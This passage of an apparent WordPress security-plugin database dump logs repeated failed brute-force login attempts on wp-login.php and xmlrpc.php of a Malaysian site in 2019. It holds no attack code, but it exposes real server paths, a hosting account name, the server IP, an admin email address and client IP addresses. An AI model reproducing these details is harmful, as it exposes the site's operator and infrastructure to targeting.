Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"197.248.157.11\";s:11:\"REMOTE_PORT\";s:5:\"55836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0FC2je8g9YegPUhtOvJAAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567425804.019\";s:12:\"REQUEST_TIME\";s:10:\"1567425804\";}}','notice','2019-09-02 12:03:25','2019-09-02 12:03:24',17692064,19182448,'https://bintara.com.my/wp-login.php',1,0,'197.248.157.11'),(23579,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"197.248.157.11\";s:11:\"REMOTE_PORT\";s:5:\"56274\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0FDjU4VuPOeWsfkg1SbQAAAQY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567425806.7094\";s:12:\"REQUEST_TIME\";s:10:\"1567425806\";}}','notice','2019-09-02 12:03:28','2019-09-02 12:03:27',18203768,19501712,'https://bintara.com.my/xmlrpc.php',1,0,'197.248.157.11'),(23580,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.145.239.207\";s:11:\"REMOTE_PORT\";s:5:\"35122\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0IaLKqO4n7fHB27AQ3RQAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567426664.7592\";s:12:\"REQUEST_TIME\";s:10:\"1567426664\";}}','notice','2019-09-02 12:17:46','2019-09-02 12:17:45',17689704,19180152,'https://bintara.com.my/wp-login.php',1,0,'192.145.239.207'),(23581,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.145.239.207\";s:11:\"REMOTE_PORT\";s:5:\"36568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0IbbKqO4n7fHB27AQ3TQAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567426669.2494\";s:12:\"REQUEST_TIME\";s:10:\"1567426669\";}}','notice','2019-09-02 12:17:50','2019-09-02 12:17:49',18202472,19500304,'https://bintara.com.my/xmlrpc.php',1,0,'192.145.239.207'),(23582,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.102.244\";s:11:\"REMOTE_PORT\";s:5:\"54395\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0NGbKqO4n7fHB27AQ57wAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567427865.3558\";s:12:\"REQUEST_TIME\";s:10:\"1567427865\";}}','notice','2019-09-02 12:37:46','2019-09-02 12:37:45',17687632,19179192,'https://bintara.com.my/wp-login.php',1,0,'195.154.102.244'),(23583,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.102.244\";s:11:\"REMOTE_PORT\";s:5:\"54582\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0NHLKqO4n7fHB27AQ58AAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567427868.3275\";s:12:\"REQUEST_TIME\";s:10:\"1567427868\";}}','notice','2019-09-02 12:37:49','2019-09-02 12:37:48',18203640,19500312,'https://bintara.com.my/xmlrpc.php',1,0,'195.154.102.244'),(23584,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.222.68\";s:11:\"REMOTE_PORT\";s:5:\"47868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0RObKqO4n7fHB27AQ8mgAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567428921.7887\";s:12:\"REQUEST_TIME\";s:10:\"1567428921\";}}','notice','2019-09-02 12:55:23','2019-09-02 12:55:22',17689704,19176848,'https://bintara.com.my/wp-login.php',1,0,'134.209.222.68'),(23585,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.222.68\";s:11:\"REMOTE_PORT\";s:5:\"47868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0RObKqO4n7fHB27AQ8mgAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567428921.7887\";s:12:\"REQUEST_TIME\";s:10:\"1567428921\";}}','notice','2019-09-02 12:55:23','2019-09-02 12:55:22',17851048,19176848,'https://bintara.com.my/wp-login.php',1,0,'134.209.222.68'),(23586,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.222.68\";s:11:\"REMOTE_PORT\";s:5:\"48362\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW0RPLKqO4n7fHB27AQ8mwAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567428924.721\";s:12:\"REQUEST_TIME\";s:10:\"1567428924\";}}','notice','2019-09-02 12:55:26','2019-09-02 12:55:25',18201792,19501272,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.222.68'),(23587,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-02 20:09:27','2019-09-02 20:09:22',17739176,18201896,'http://bintara.com.my/staging/index.php?xxxxxxxxxxxx_loads=true',1,0,'5.135.138.188'),(23588,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_A